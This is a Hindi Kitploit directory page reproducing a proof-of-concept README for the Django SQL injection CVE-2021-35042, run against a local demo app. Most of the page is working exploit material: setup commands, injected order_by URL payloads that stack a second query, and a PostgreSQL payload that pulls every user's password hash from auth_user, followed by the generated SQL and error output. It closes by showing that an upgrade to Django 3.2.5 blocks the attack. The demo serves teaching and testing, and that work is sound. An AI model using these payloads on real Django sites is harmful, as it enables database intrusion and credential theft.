Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-35042 — Django SQL इंजेक्शन (CVE-2021-35042) को प्रदर्शित करने वाली इंटरैक्टिव प्रमाण-अवधारणा, जिसमें SQLite और PostgreSQL डेटाबेस के विरुद्ध चरण-दर-चरण शोषण शामिल है। | Kitploit
उपकरण/GitHubGitHub/r4vi/cve-2021-35042
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाडेटाबेस सुरक्षा
GitHubr4vi/cve-2021-35042

CVE-2021-35042

Django SQL इंजेक्शन (CVE-2021-35042) को प्रदर्शित करने वाली इंटरैक्टिव प्रमाण-अवधारणा, जिसमें SQLite और PostgreSQL डेटाबेस के विरुद्ध चरण-दर-चरण शोषण शामिल है।

रिपॉजिटरी देखें
524 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-35042

Django SQL इंजेक्शन बग

प्रश्न: यह कितना शोषणीय है, इसका पता लगाएं?

उत्तर: मैं भयभीत हूँ।

स्थापना

poetry install

poetry run ./manage.py migrate

poetry run ./manage.py loaddata dummydata.json

इंटरैक्टिव डेमो

poetry run ./manage.py runserver

रैंडम फ़ील्ड्स द्वारा क्रमबद्ध करना

http://localhost:8000/?order_by=%22core_things_tags%22.%22things_id%22 पर जाएं ध्यान दें कि ?order_by पैरामीटर एक कॉलम "core_things_tags"."things_id" के लिए Raw SQL संदर्भ पास कर रहा है।

पहली क्वेरी समाप्त करें और कुछ SQL चलाने का प्रयास करें

यह लगभग उतना ही है जितना आप प्राप्त कर सकते हैं: http://localhost:8000/?order_by=%22core_things_tags%22.%22things_id%22%20and%201);%20select%201%20as%20name%20;-- जो पहली SQL क्वेरी को बंद करता है और निम्नलिखित SQL में अनुवाद करता है:

root@kitploit:~
SELECT "core_things"."id",
       "core_things"."name",
       COUNT("core_things_tags"."tag_id") AS "num_tags"
FROM "core_things"
         LEFT OUTER JOIN "core_things_tags" ON ("core_things"."id" =
                                                "core_things_tags"."things_id")
GROUP BY "core_things"."id", "core_things"."name",
         ("core_things_tags"."things_id" and 1);
select 1 as name;--) ORDER BY ("core_things_tags"."things_id" and 1); select 1 as name ;--) ASC LIMIT 21; args=()

जो इस त्रुटि के साथ विफल होता है:

root@kitploit:~
Warning at /
You can only execute one statement at a time.

यह सिर्फ इसलिए है क्योंकि sqlite एक बार में केवल 1 क्वेरी चला सकता है।

पोस्टग्रेस के साथ दूसरी क्वेरी चलाने पर पुनर्विचार करें

root@kitploit:~
export DJANGO_DATABASE_URL=postgres://user:pass@localhost:5432/cve-2021-35042 # make this a valid DATABASE_URL for your own postgres server

poetry run ./manage.py migrate

poetry run ./manage.py loaddata dummydata.json

poetry run ./manage.py createsuperuser # निर्देशों का पालन करें

यहां विज़िट करें: http://localhost:8000/?order_by=%22core_things_tags%22.%22things_id%22%20);%20SELECT%201%20as%20id,%20%22password%22as%20name,%201%20as%20num_tags%20from%20%22auth_user%22;--

जो निम्नलिखित SQL चलाता है:

root@kitploit:~
SELECT "core_things"."id",
       "core_things"."name",
       COUNT("core_things_tags"."tag_id") AS "num_tags"
FROM "core_things"
         LEFT OUTER JOIN "core_things_tags" ON ("core_things"."id" =
                                                "core_things_tags"."things_id")
GROUP BY "core_things"."id", ("core_things_tags"."things_id");
SELECT 1 as id, "password" as name, 1 as num_tags
from "auth_user";--) ORDER BY ("core_things_tags"."things_id" ); SELECT 1 as id, "password"as name, 1 as num_tags from "auth_user";--) ASC;

अब आप मूलतः कुछ भी कर सकते हैं। यह क्वेरी प्रत्येक उपयोगकर्ता के लिए पासवर्ड हैश चुरा लेती है।

गैर-संवेदनशील संस्करण में अपग्रेड करें

अब अस्थायी रूप से django अपग्रेड करें

poetry shell

pip install Django==3.2.5

उपरोक्त URL पर पुनः जाएं और ध्यान दें कि यह अब काम नहीं करता:

root@kitploit:~
FieldError at /
Cannot resolve keyword '"core_things_tags"."things_id"' into field. Choices are: id, name, num_tags, tags
टूल डाउनलोड करें